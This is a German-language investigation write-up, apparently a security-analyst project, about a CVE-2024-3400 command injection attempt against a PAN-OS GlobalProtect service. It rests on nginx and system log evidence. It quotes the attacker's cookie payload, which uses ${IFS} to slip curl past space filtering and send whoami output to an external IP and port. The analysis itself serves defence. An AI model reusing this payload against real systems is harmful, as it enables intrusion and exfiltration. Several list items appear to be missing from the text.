
Untersuchung eines PAN-OS CVE-2024-3400 command injection-Versuchs, Analyse der Payload-Übermittlung, internen Verarbeitung und Ausführungsvalidierung auf Basis von Log-Beweisen.
Dieses Projekt dokumentiert die Untersuchung eines CVE-2024-3400 Command Injection-Versuchs, der auf einen PAN-OS GlobalProtect-Dienst abzielt.
Das Ziel war zu ermitteln:
Ein kritischer Alarm wurde ausgelöst, der auf einen möglichen Exploit-Versuch hinwies.

Die Anfrage enthält ein manipuliertes Cookie:
SESSID=... curl${IFS}144.172.79.92:4444?user=$(whoami)

${IFS} umgeht die Leerzeichenfilterungwhoami versucht, die Systemidentität abzurufencurl versucht eine ausgehende KommunikationDies ist ein Command Injection Payload
Nginx-Logs bestätigen, dass die Anfrage den Server erreicht hat:
POST /global-protect/login.esp
HTTP 200
User-Agent: curl

Die schädliche Anfrage wurde akzeptiert und verarbeitet.
System-Logs zeigen, dass der Payload die interne Logik erreicht hat:

dt_curl)Allerdings:
DNS-Abfrage fehlgeschlagen → ausgehende Verbindung fehlgeschlagen
Die angreifende IP:

Dies bestätigt die Herkunft von einem externen Angreifer.
Mehrere IPs interagierten vor dem Angriff mit dem System:

Nur 144.172.79.92 ist direkt mit dem Exploit verbunden.
Dies war ein echter Command Injection-Versuch.
Der Angreifer hat erfolgreich:
Allerdings:
es gibt keine bestätigte Ausführung oder Systemkompromittierung
Command Injection-Versuch
Payload verarbeitet - Keine bestätigte Ausführung oder Auswirkung